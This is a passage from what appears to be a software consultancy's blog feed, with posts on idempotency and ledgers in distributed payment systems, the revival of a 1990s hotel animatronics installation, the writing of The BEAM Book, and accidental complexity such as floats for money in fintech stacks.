&lt;p&gt;There are only two hard problems in distributed systems:&lt;/p&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Exactly-once delivery&lt;/li&gt;
&lt;li&gt;Guaranteed order of messages&lt;/li&gt;
&lt;li&gt;Exactly-once delivery&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;databases-already-solved-this&quot; tabindex=&quot;-1&quot;&gt;Databases Already Solved This&lt;/h2&gt;
&lt;p&gt;In the 1970s and 80s, relational databases gave us transactions. &lt;code&gt;BEGIN&lt;/code&gt;,
&lt;code&gt;COMMIT&lt;/code&gt;, &lt;code&gt;ROLLBACK&lt;/code&gt;. Two-phase commit across a couple of resources.&lt;/p&gt;
&lt;p&gt;For many business systems this was enough. Inside one database boundary, you could rely on exactly-once semantics and sleep well.&lt;/p&gt;
&lt;p&gt;Databases even solved the two &amp;quot;hard problems&amp;quot; of distributed systems: ordering and exactly-once delivery, by hiding them under the hood. A master node applied every write in order, replicas replayed the log, and the system recovered after crashes. To the developer, it looked simple: every committed transaction happened once, in order. The complexity was real, but it was contained inside the database engine.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;the-world-changed&quot; tabindex=&quot;-1&quot;&gt;The World Changed&lt;/h2&gt;
&lt;p&gt;Modern architectures encourage each microservice to own its database.
A single payment now crosses several services and several persistence layers.&lt;/p&gt;
&lt;p&gt;Two-phase commit across them is brittle, expensive, and slow.
Crashes, retries, and failovers are the norm. The old guarantees don&#39;t reach that far.&lt;/p&gt;
&lt;p&gt;As Gregor Hohpe noted in his classic essay &lt;a href=&quot;https://www.enterpriseintegrationpatterns.com/ramblings/18_starbucks.html&quot;&gt;&lt;em&gt;Starbucks Doesn&#39;t Use Two-Phase Commit&lt;/em&gt;&lt;/a&gt;,
the coffee shop doesn&#39;t lock a global transaction until your latte is ready.
It takes your order, gives you a token, and processes each step independently.
The business process absorbs retries and delays, rather than the infrastructure pretending they cannot happen.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;what-works-today&quot; tabindex=&quot;-1&quot;&gt;What Works Today&lt;/h2&gt;
&lt;p&gt;Instead of promising exactly once, modern systems aim for &lt;strong&gt;at-least once execution with consistent outcomes&lt;/strong&gt;.
The same request may run multiple times, but the final state is unambiguous.&lt;/p&gt;
&lt;p&gt;The main tools:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Transaction tokens (idempotency keys).&lt;/strong&gt;
Generated at the very start, carried through every call and write.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Idempotent operations.&lt;/strong&gt;
Each subsystem treats &amp;quot;process payment with token X&amp;quot; as a conditional write: succeed once, or return the same result again.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Persistent logs.&lt;/strong&gt;
Append-only records allow reconciliation after crashes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Event-based systems and message queues.&lt;/strong&gt;
Kafka, RabbitMQ, or SQS provide durability and back-pressure. But they only guarantee at-least-once delivery.
Your handlers still need tokens and idempotency to prevent duplicates.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;when-security-or-scale-demands-more&quot; tabindex=&quot;-1&quot;&gt;When Security or Scale Demands More&lt;/h2&gt;
&lt;p&gt;For flows that span companies, regulators, or geographies, further
reinforcement helps:&lt;/p&gt;
&lt;h3 id=&quot;ledgers&quot; tabindex=&quot;-1&quot;&gt;Ledgers&lt;/h3&gt;
&lt;p&gt;Append-only histories allow replay, audit, and reconciliation.&lt;/p&gt;
&lt;p&gt;In payments this is more than a log file, it is often &lt;strong&gt;double-entry
bookkeeping&lt;/strong&gt; at the core.
Every debit has a matching credit, and the ledger balances at all times.
Settlement windows (say, end-of-day netting between banks) depend on these
records, as do regulatory audit trails.&lt;/p&gt;
&lt;p&gt;This is not a new idea. As Jim Gray described in his 1978 work on
transaction processing,
databases have always relied on a commit log to guarantee durability and
recoverability.
The log &lt;em&gt;is&lt;/em&gt; the database. What modern ledger systems and blockchains add
is immutability and verifiability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Hash-chained logs.&lt;/strong&gt;
Every entry in the ledger includes a cryptographic hash of the previous entry.
This creates a chain where altering even a single past record changes every hash after it.
The effect is tamper evidence: regulators, auditors, or counterparties can verify that no history has been rewritten.
In payments this is critical for settlement systems where disputes may
arise months later, the hash chain proves the record is intact.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Patricia-Merkle trees.&lt;/strong&gt;
(We implemented these for the aeternity blockchain; see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/blockchain-audit/&quot;&gt;Audits through Merkle Root Hashes&lt;/a&gt; for practical applications.)
These are tree-shaped data structures where each branch node contains the
hash of its children.
They allow you to prove the presence (or absence) of a transaction
without revealing the entire ledger.
For example, a bank can prove to a regulator that a given transfer is
included in the ledger,
or two institutions can reconcile only the subset of accounts they have
in common.
This makes cross-organization settlement and audit feasible without
exchanging full databases.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The result is a tamper-evident accounting system suitable for flows that
span organizations and regulators.
This is why your bank transfer shows as &amp;quot;pending&amp;quot; for a day or two: it sits
in a settlement ledger until the window closes and reconciliation
completes.&lt;/p&gt;
&lt;h3 id=&quot;crdts&quot; tabindex=&quot;-1&quot;&gt;CRDTs&lt;/h3&gt;
&lt;p&gt;Conflict-free replicated data types (CRDTs) allow distributed nodes to
update independently and converge without locks.&lt;/p&gt;
&lt;p&gt;In payments, this matters when multiple actors must see consistent balances
without a single global database.
Imagine a mobile wallet replicated across regions: users can initiate
payments offline or under flaky networks.
Each node accepts local updates, and CRDTs guarantee the balances converge
once connectivity is restored.&lt;/p&gt;
&lt;p&gt;Chris Meiklejohn and colleagues have shown how CRDTs can underpin highly
available systems that still provide strong convergence guarantees.
Systems like &lt;a href=&quot;https://www.filibuster.cloud/&quot;&gt;Filibuster&lt;/a&gt; push this further
by systematically testing failure scenarios in microservices,
ensuring that retries and idempotency hold even under complex distributed
failures.&lt;/p&gt;
&lt;p&gt;Academic work such as &lt;a href=&quot;https://dl.acm.org/doi/10.1145/2790449.2790525&quot;&gt;Meiklejohn &amp;amp; Van Roy&#39;s
&amp;quot;Lasp&amp;quot;&lt;/a&gt; and later work on
&lt;a href=&quot;https://dl.acm.org/doi/10.1145/3408976&quot;&gt;replicated data types at scale&lt;/a&gt;
point to a future where distributed programming models incorporate these
guarantees by design, rather than bolting them on afterwards.&lt;/p&gt;
&lt;p&gt;These approaches do not remove complexity, but they make convergence
predictable.
They are the natural extension of the same instinct that made relational
databases so powerful in the 70s:
encapsulate the hard problems once, so that application developers can move
faster with less risk.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;practical-guidance&quot; tabindex=&quot;-1&quot;&gt;Practical Guidance&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;If one service and one database can own the whole transaction, trust it.&lt;/li&gt;
&lt;li&gt;If multiple services are involved, add tokens, idempotency, and durable queues.&lt;/li&gt;
&lt;li&gt;If multiple organizations or regions are involved, add ledgers and consider CRDTs.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is not academic. It&#39;s how real-world systems run.
Stripe processes millions of payments a day using idempotency keys.
Your bank marks a transfer as &amp;quot;pending&amp;quot; because it sits in a settlement ledger until the next batch window.
The point is not to eliminate retries or duplicates, but to make them safe and boring.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Assembler, Stepper Motors, and a Hotel Pool</title>
    <link href="https://happihacking.com/blog/posts/2025/statt_background/"/>
    <updated>2025-08-18T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/statt_background/</id>
    <summary>Revisiting the animatronic spy drama of Haparanda Stadshotell, three decades later</summary>
    <content type="html">&lt;h1 id=&quot;the-spy-dolls-under-the-dance-floor&quot; tabindex=&quot;-1&quot;&gt;The Spy Dolls Under the Dance Floor&lt;/h1&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/kgb_doll.jpg&quot; alt=&quot;A dirty, dusty scene
with an old spy doll and a tray.&quot; title=&quot;A dirty, dusty scene
with an old spy doll and a tray.&quot; /&gt; “A dirty spy.”&lt;/p&gt;
&lt;p&gt;In the early 90s, before I got my Computer Science education, I had already
been programming for over a decade. My path didn’t begin in academia. It
started with a Texas Instruments calculator, then a VIC-20, a Commodore 64,
and later an ABC-80 and 800. By the time I bought my first PC, I was deep
into BASIC, 6502 assembler, with the occasional detour into Pascal. Most of
what I knew came from &lt;em&gt;Doctor Dobb’s Journal&lt;/em&gt;, &lt;em&gt;BYTE&lt;/em&gt;, POC magazine, and a
small stack of programming books, like Peter Norton’s Programmer’s Guide to
the IBM PC, that felt like treasures.&lt;/p&gt;
&lt;p&gt;By 1989 I had even started my own consulting company, mostly as a way to
write off expensive hardware. That company gave me assignments like a
consolidated account statement program for Norrfryskoncernen. Through them
I also got to know Haparanda Stadshotell, known simply as “Statt”, a place
full of history and, for me, many memories.&lt;/p&gt;
&lt;p&gt;One of those memories is now coming back to life.&lt;/p&gt;
&lt;h3 id=&quot;the-animatronics-project&quot; tabindex=&quot;-1&quot;&gt;The Animatronics Project&lt;/h3&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/nils_by_ulf.jpg&quot; alt=&quot;A caricature of my
father drawn by Ulf R Hansson.&quot; title=&quot;A caricature of my
father drawn by Ulf R Hansson.&quot; /&gt; “A caricature of my father, drawn by
Ulf R. Hansson, the artist I collaborated with on the Stadshotellet
animatronics project.”&lt;/p&gt;
&lt;p&gt;Around 1991–92, I worked with the artist and teacher Ulf R. Hansson to
build an unusual installation in Stadshotellet’s old indoor pool (which
later became the dance floor under a glass roof). We called it the spy
scene of KGB 1917. KGB was then new name for the bistro annex to the
hotel: &amp;quot;Kaffé Gulach Baronen&amp;quot;.&lt;/p&gt;
&lt;p&gt;It was part animatronics, part theatre, part Cold War curiosity. Handmade
dolls and a tray moved by stepper motors, synchronized to a cassette tape
soundtrack. Everything was controlled by a 286 PC running pure assembler
that I had written. No frameworks. No abstractions. Just hardware hacking
and bare-metal code.&lt;/p&gt;
&lt;p&gt;For a while, it ran regularly. Guests at Statt could look down through the
glass floor and see the little spy drama unfold. And then, like many side
projects of its time, it fell silent.&lt;/p&gt;
&lt;p&gt;Some say it was lightning, some say it was that the dancers scratched the
glass floor so much so you couldn&#39;t see anything.&lt;/p&gt;
&lt;h3 id=&quot;thirty-years-later&quot; tabindex=&quot;-1&quot;&gt;Thirty Years Later&lt;/h3&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/the_kgb_setup.jpg&quot; alt=&quot;Me standing in
the cellar with the old setup.&quot; title=&quot;Me standing in
the cellar with the old setup.&quot; /&gt; “Everything still there, covered in
dust.”&lt;/p&gt;
&lt;p&gt;The system has been dormant for more than three decades. The dolls, tray,
motors, and cassette player just sat in the cellar where they were left,
while the hotel reinvented itself around them. But now, as Stadshotellet
approaches its 125-year celebration, the owners want the show to return.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/the_kgb_controller.jpg&quot; alt=&quot;Some
hardware hacks controlling stepping motors.&quot; title=&quot;Some
hardware hacks controlling stepping motors.&quot; /&gt; “Was I a hardware hacker?”&lt;/p&gt;
&lt;p&gt;That’s where I come in again. The task: bring the spy dolls back to life.
Preserve their nostalgic charm, but give them a new, reliable control
system that can run daily for modern audiences.&lt;/p&gt;
&lt;p&gt;It feels like a bridge between eras. In 1992, I was a self-taught
programmer from Haparanda, living on magazines and sheer curiosity, hacking
assembler late into the night. Today, I design scalable systems for fintech
and regulated industries, built to survive Friday deploys and Monday
audits. And somehow, the old spy scene connects the two.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/kgb_listing.jpg&quot; alt=&quot;A dir command:
KGB19717.ASM 26185 93-06-11.&quot; title=&quot;A dir command:
KGB19717.ASM 26185 93-06-11.&quot; /&gt; “26kB assembler code.”&lt;/p&gt;
&lt;h3 id=&quot;next&quot; tabindex=&quot;-1&quot;&gt;Next&lt;/h3&gt;
&lt;p&gt;Over the coming months, I’ll plan to share the journey of reviving this
project. From site inspections and dusty cassette tapes to Raspberry Pis,
YAML choreography, and motor drivers. It’s part archaeology, part
engineering, and part nostalgia.&lt;/p&gt;
&lt;p&gt;For me, it’s also a reminder of where this all began.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/kgb_assembler.jpg&quot; alt=&quot;A listing of
assembler code.&quot; title=&quot;A listing of
assembler code.&quot; /&gt; “Surprisingly well documented, in Swedish.”&lt;/p&gt;
&lt;p&gt;Next, I need to figure out how to extract 26 KB of assembler code from a PC
with only a floppy drive and no network. The dolls may still be intact, but
the real archaeology starts with the bits.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Why I Wrote the BEAM Book</title>
    <link href="https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/"/>
    <updated>2025-06-03T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/</id>
    <summary>Post-mortems, coffee, and a decade of stubborn curiosity</summary>
    <content type="html">&lt;h2 id=&quot;why-i-wrote-the-beam-book&quot; tabindex=&quot;-1&quot;&gt;Why I wrote the Beam Book&lt;/h2&gt;
&lt;p&gt;After ten years of keeping Klarna’s core system upright I know this: a 15
millisecond pause in the BEAM can stall millions of peak-shopping payments, trigger a 3 a.m. Christmas-Eve post-mortem, and earn you a very awake call from the CEO. I wrote &lt;em&gt;The BEAM Book&lt;/em&gt; so the next engineer fixes that pause before the coffee cools.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/thebeambooks.jpg&quot; alt=&quot;A picture of two printed BEAM Books.&quot; title=&quot;A picture of two printed BEAM Books.&quot; /&gt;
&lt;h3 id=&quot;origins&quot; tabindex=&quot;-1&quot;&gt;Origins&lt;/h3&gt;
&lt;p&gt;I opened the project on 12 October 2012 with a lone DocBook file with four lines of text and an oversized sense of optimism.
After two weeks, the commit log is mostly me adding structure, moving
headings, and updating metadata. Most of it is scaffolding. The actual
content is still just a few hopeful lines.&lt;/p&gt;
&lt;p&gt;By November I had abandoned DocBook for AsciiDoc, written a custom build
script, and convinced myself the book could be wrapped up in six months.
Those early commits glow with energy: adds, rewrites, then more
rewrites to fix the rewrites.
Delusion is underrated.&lt;/p&gt;
&lt;p&gt;In 2013 I managed to convince O’Reilly to publish. Moving the repo to their
Atlas system sounded simple until Atlas began hiding my main file and
overwriting half-finished chapters.&lt;/p&gt;
&lt;p&gt;The Git history reads like a diary of frustration:
“Moving files to top level to cope with Atlas,” “Atlas seems to be
overwriting book.asciidoc”. Word count shot past 120 000 while actual
progress crawled. On 10 March 2015 I was literally “Smashing chapters into sections” just to keep the build green.&lt;/p&gt;
&lt;p&gt;The quiet cancellation came two months later. No drama, just a polite call and a line through the contract. Relief mingled with embarrassment, I had spent two years rearranging files rather than finishing sentences.&lt;/p&gt;
&lt;p&gt;Pragmatic Bookshelf took over that same year. I kept working in CVS for
their production system, but progress was slow. Eventually, they cancelled
too. On 20 January 2017, I imported everything into a new repo in one
massive commit: 6,622 files, over a million lines.
The rewrite stalled, and so did the project.&lt;/p&gt;
&lt;p&gt;On 23 March 2017 I started fresh with Asciidoctor in a private GitHub repo, copy-pasting
only the parts that still made sense. Two weeks later, on April 7, minutes before
a lecture at Chalmers, I flipped the repository public. Within twenty-four
hours strangers fixed typos, added diagrams, and merged a Creative Commons
BY-4.0 license.&lt;/p&gt;
&lt;h3 id=&quot;what-kept-me-going&quot; tabindex=&quot;-1&quot;&gt;What Kept Me Going&lt;/h3&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://api.star-history.com/svg?repos=happi/theBeamBook&amp;type=Date&quot; alt=&quot;A picture of the stars on GitHub passing 3000.&quot; title=&quot;A picture of the stars on GitHub passing 3000.&quot; /&gt;
&lt;p&gt;I kept going because I wanted to understand the BEAM properly. There’s
value in following the real logic, not just the surface explanations.&lt;/p&gt;
&lt;p&gt;Community feedback made a difference. As soon as the repo was public,
people began sending corrections, examples, and improvements.&lt;/p&gt;
&lt;p&gt;Seeing the numbers of people starring the repo on GitHub kept me going.
One highlight: &lt;strong&gt;Issue #113 - &amp;quot;Please continue being awesome.&amp;quot;&lt;/strong&gt;
(I wrote &lt;a href=&quot;https://happihacking.com/blog/posts/2025/an_issue/&quot;&gt;a whole post about that issue&lt;/a&gt;.)
That emoji-laced drive-by encouragement (August 2018) still pops into my
head whenever motivation dips.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/issue113.png&quot; alt=&quot;Issue 113: This book
is ridiculously good. I have only read a few bits of it so far and have
learned a lot already. Please continue being awesome!&quot; title=&quot;Issue 113: This book
is ridiculously good. I have only read a few bits of it so far and have
learned a lot already. Please continue being awesome!&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The book started showing up as a reference in Erlang and BEAM conference
talks, sometimes several times in the same event. That was a clear signal
that others needed this as much as I did.&lt;/p&gt;
&lt;p&gt;Even Twitter (in the good old days of Twitter) played a role. Whenever
someone mentioned the book or shared a
link, it was an extra nudge to keep at it.&lt;/p&gt;
&lt;p&gt;Mostly, I just wanted a manual I could trust myself, a reference for the
parts of the VM that matter when things go wrong. That’s reason enough to
keep writing, even after the third rewrite.&lt;/p&gt;
&lt;h3 id=&quot;whats-inside-the-book-who-it-helps&quot; tabindex=&quot;-1&quot;&gt;What’s Inside the Book &amp;amp; Who It Helps&lt;/h3&gt;
&lt;p&gt;The book covers what I wish I’d had when building and operating large
Erlang systems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Schedulers and process management: How the BEAM schedules,
prioritizes, and balances processes under real load.&lt;/li&gt;
&lt;li&gt;Processes and their memory: How process heaps,
stack, messages, and binaries are managed and
why these details matter in production.&lt;/li&gt;
&lt;li&gt;Garbage collection and memory: What actually happens
with per-process and global garbage collectors, binary references,
and memory leaks.&lt;/li&gt;
&lt;li&gt;Tagging schemes and terms: How the BEAM represents data-integers,
floats, tuples, binaries, references-down to the tagging bits.&lt;/li&gt;
&lt;li&gt;The compiler and the VM: How code is turned into instructions,
what the compiler does (and doesn’t do), and how the emulator executes it.&lt;/li&gt;
&lt;li&gt;Tracing and debugging: Practical use of dbg, erlang:trace,
and other tools to follow messages, events, and identify bottlenecks.&lt;/li&gt;
&lt;li&gt;Performance tuning: What matters when profiling real code,
understanding reductions, and tracking down real-world latency problems.&lt;/li&gt;
&lt;li&gt;System architecture: How ERTS, the BEAM VM, and their subsystems
actually work together in a running node.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you build or operate Erlang or Elixir systems, especially under any kind
of scale-this book is for you. It saves you from hunting through mailing
lists, scattered docs, and code comments just to answer, “Why is the VM
behaving like this?”&lt;/p&gt;
&lt;h3 id=&quot;lessons-learned&quot; tabindex=&quot;-1&quot;&gt;Lessons Learned&lt;/h3&gt;
&lt;p&gt;Persistence beats perfection. Two cancelled publishing deals look bad on a
résumé, but an unfinished idea looks worse.&lt;/p&gt;
&lt;p&gt;Boundaries matter. I made progress by blocking time for writing, turning
off notifications, and treating focus like a real deadline. Fika at 14:30
is non-negotiable.&lt;/p&gt;
&lt;p&gt;The crowd helps. Making the repo public brought in corrections,
encouragement, and the occasional nudge when motivation was low.&lt;/p&gt;
&lt;p&gt;Scope is everything. I cut the details on dirty schedulers, the new JIT,
and the debugger. Maybe those will end up in an appendix, but not in the
core. I wrote more about this scoping process in &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_beam_book_lessons/&quot;&gt;The BEAM Book Is Almost Done&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Ship, then iterate. The BEAM changes every year. A living Git repo keeps
up.&lt;/p&gt;
&lt;p&gt;A real deadline helps. This January, during my yearly review, I
decided to print the book in time for Code Beam Stockholm. I thought I had
until autumn, turns out the conference was June 2. That’s how you find out
what’s truly essential.&lt;/p&gt;
&lt;h3 id=&quot;definition-of-done&quot; tabindex=&quot;-1&quot;&gt;Definition of Done&lt;/h3&gt;
&lt;p&gt;Holding the print in my hands, it finally feels finished, at least for now. Years of scattered commits are bound into something real, so I’m calling it done.&lt;/p&gt;
&lt;h3 id=&quot;get-involved&quot; tabindex=&quot;-1&quot;&gt;Get Involved&lt;/h3&gt;
&lt;p&gt;You can now get the paperback-The BEAM Book 1.0 is live on Amazon. Buy it
here. &lt;a href=&quot;https://www.amazon.com/dp/9153142535&quot;&gt;Amazon&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If you spot an error, want to improve something, or just want to see how it
works under the hood, star or fork the repo. File an issue or, even better,
submit a pull request. Contributors are credited in the acknowledgments.
&lt;a href=&quot;https://github.com/happi/theBeamBook&quot;&gt;GitHub: theBeamBook&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If you read the book, please leave an honest review.
Algorithms notice real feedback more than marketing copy.&lt;/p&gt;
&lt;p&gt;If your team wants a deep dive, I run hands-on BEAM internals
workshops, tailored for real systems, not just hello world.
Email me if that’s what you need.
&lt;a href=&quot;mailto:happi@happihacking.com&quot;&gt;happi@happihacking.com&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Your Finance Stack Is Lying to You</title>
    <link href="https://happihacking.com/blog/posts/2025/fintech_complexity/"/>
    <updated>2025-05-22T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/fintech_complexity/</id>
    <summary>Accidental Complexity in Fintech</summary>
    <content type="html">&lt;h1 id=&quot;your-finance-stack-is-lying-to-you&quot; tabindex=&quot;-1&quot;&gt;Your Finance Stack Is Lying to You&lt;/h1&gt;
&lt;p&gt;Why Untyped Data, Floats, and “Excel Thinking” Are Quietly Costing You Millions&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/simplicity.jpg&quot; alt=&quot;A picture of the plumbing for my heating system with the caption: Simplicity - It&#39;s for simpletons.&quot; title=&quot;A picture of the plumbing for my heating system with the caption: Simplicity - It&#39;s for simpletons.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;At a recent fintech conference, I was struck by how much engineering effort, across both startups and enterprises, is spent cleaning up avoidable messes. Not building competitive advantages. Just damage control:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rounding errors in reports&lt;/li&gt;
&lt;li&gt;Mismatched payment records&lt;/li&gt;
&lt;li&gt;Inconsistent handling of currency and tax&lt;/li&gt;
&lt;li&gt;Broken reconciliation across systems&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Entire teams, and even companies, exist just to fix these issues. The root cause?&lt;/p&gt;
&lt;p&gt;Untyped, context-free data.&lt;/p&gt;
&lt;h2 id=&quot;the-excel-legacy-that-wont-die&quot; tabindex=&quot;-1&quot;&gt;The Excel Legacy That Won’t Die&lt;/h2&gt;
&lt;p&gt;Most financial systems still think like spreadsheets. In Excel, 100 can mean anything: euros, dollars, cents, basis points. There’s no schema. No units. No context.&lt;/p&gt;
&lt;p&gt;That thinking leaks into production systems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;APIs with vague fields like amount, value, or fee&lt;/li&gt;
&lt;li&gt;float(8) columns for monetary values&lt;/li&gt;
&lt;li&gt;Boolean values stored as &amp;quot;yes&amp;quot;/&amp;quot;no&amp;quot;&lt;/li&gt;
&lt;li&gt;Timestamps with no timezone&lt;/li&gt;
&lt;li&gt;Magic numbers passed around without meaning&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It might be fast to prototype. But it creates long-term ambiguity, and ambiguity compounds into bugs, delays, and failures.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Essential vs Accidental Complexity&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Essential complexity&lt;/strong&gt; is built into the (financial) domain itself, like multiple
currencies, tax rules, compliance steps.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Accidental complexity&lt;/strong&gt; is everything we add on top: floats for money,
ambiguous JSON fields, brittle one-off scripts.
This article shows how accidental complexity quietly overwhelms the essential.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;its-worse-in-big-companies&quot; tabindex=&quot;-1&quot;&gt;It’s Worse in Big Companies&lt;/h2&gt;
&lt;p&gt;This isn’t just a startup problem.&lt;/p&gt;
&lt;p&gt;Large enterprises, such as banks, insurance firms, payment providers, layer complex architectures on top of the same assumptions.&lt;/p&gt;
&lt;p&gt;To deal with the resulting chaos, they adopt:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ESBs (Enterprise Service Buses) to transform one vague schema into another&lt;/li&gt;
&lt;li&gt;iPaaS (Integration Platform as a Service) tools to sync inconsistent fields across internal platforms&lt;/li&gt;
&lt;li&gt;Custom middleware and manual workarounds just to keep systems aligned&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The irony? Many of these systems exist solely to translate &amp;quot;value&amp;quot;: 100 into another format of &amp;quot;value&amp;quot;: 100.&lt;/p&gt;
&lt;p&gt;It’s not domain complexity. It’s accidental complexity, caused by a lack of enforced structure.&lt;/p&gt;
&lt;h2 id=&quot;b2b-invoicing-is-still-email-and-pdfs&quot; tabindex=&quot;-1&quot;&gt;B2B Invoicing Is Still Email and PDFs&lt;/h2&gt;
&lt;p&gt;If you think we’ve moved past this, look at B2B invoicing.&lt;/p&gt;
&lt;p&gt;In 2025, most companies still send and receive invoices via PDFs attached to emails.&lt;/p&gt;
&lt;p&gt;Some are exported from ERPs. Others are typed manually in Word. On the receiving end:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Amounts are extracted with OCR or regex&lt;/li&gt;
&lt;li&gt;PO numbers are verified manually&lt;/li&gt;
&lt;li&gt;Payment terms and VAT rates are interpreted via email follow-ups&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Even with e-invoicing formats like Peppol or Factur-X available, adoption is partial and enforcement is weak. Most systems fall back to parsing visual representations of meaning, not actual structured data.&lt;/p&gt;
&lt;p&gt;This leads to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Duplicate or late payments&lt;/li&gt;
&lt;li&gt;Misrouted funds&lt;/li&gt;
&lt;li&gt;Fraud via spoofed invoices&lt;/li&gt;
&lt;li&gt;Manual reconciliation loops that delay accounting closes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We’re throwing machine learning and automation at a problem that starts with: Why are we still emailing pictures of invoices?&lt;/p&gt;
&lt;h2 id=&quot;floats-the-silent-saboteurs&quot; tabindex=&quot;-1&quot;&gt;Floats, the Silent Saboteurs&lt;/h2&gt;
&lt;p&gt;A particularly nasty example: using floats for money.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0.1 + 0.2 != 0.3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It’s the reason your payment gateway and your ledger might silently disagree.&lt;/p&gt;
&lt;p&gt;Using floating-point types for financial calculations leads to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rounding errors&lt;/li&gt;
&lt;li&gt;Reconciliation drift&lt;/li&gt;
&lt;li&gt;Bugs that only surface under load, scale, or edge cases&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Use integers for minor units (e.g. cents) or proper decimal types. Never float.&lt;/p&gt;
&lt;h2 id=&quot;llms-are-not-helping&quot; tabindex=&quot;-1&quot;&gt;LLMs Are Not Helping&lt;/h2&gt;
&lt;p&gt;Large language models like ChatGPT can now write your APIs, schemas, and database models.&lt;/p&gt;
&lt;p&gt;But unless you’re careful, they’ll replicate the same bad patterns. Just faster:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;amount: number with no context&lt;/li&gt;
&lt;li&gt;float instead of decimal&lt;/li&gt;
&lt;li&gt;JSON blobs without units, validation, or structure&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;LLMs autocomplete based on frequency, not correctness.
Without strong engineering guardrails, you’re just mass-producing technical debt.&lt;/p&gt;
&lt;h2 id=&quot;databases-and-the-illusion-of-structure&quot; tabindex=&quot;-1&quot;&gt;Databases and the Illusion of Structure&lt;/h2&gt;
&lt;p&gt;Even when your application code is well-typed, your database schema often isn’t. Relational databases may enforce column types (float, int, varchar), but they rarely capture meaning.&lt;/p&gt;
&lt;p&gt;A column named amount might hold:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Gross or net values&lt;/li&gt;
&lt;li&gt;In different currencies&lt;/li&gt;
&lt;li&gt;As float or decimal&lt;/li&gt;
&lt;li&gt;With or without tax&lt;/li&gt;
&lt;li&gt;In cents or full units&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Unless you enforce units and context explicitly, via naming conventions, type systems, or documentation, your schema becomes a silent source of ambiguity.&lt;/p&gt;
&lt;p&gt;And in NoSQL databases like MongoDB, it gets worse.&lt;/p&gt;
&lt;p&gt;Mongo stores everything as JSON-like documents. There’s no enforced schema unless you layer one on top. So teams end up storing arbitrary fields like:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{ &amp;quot;value&amp;quot;: 99.99 }
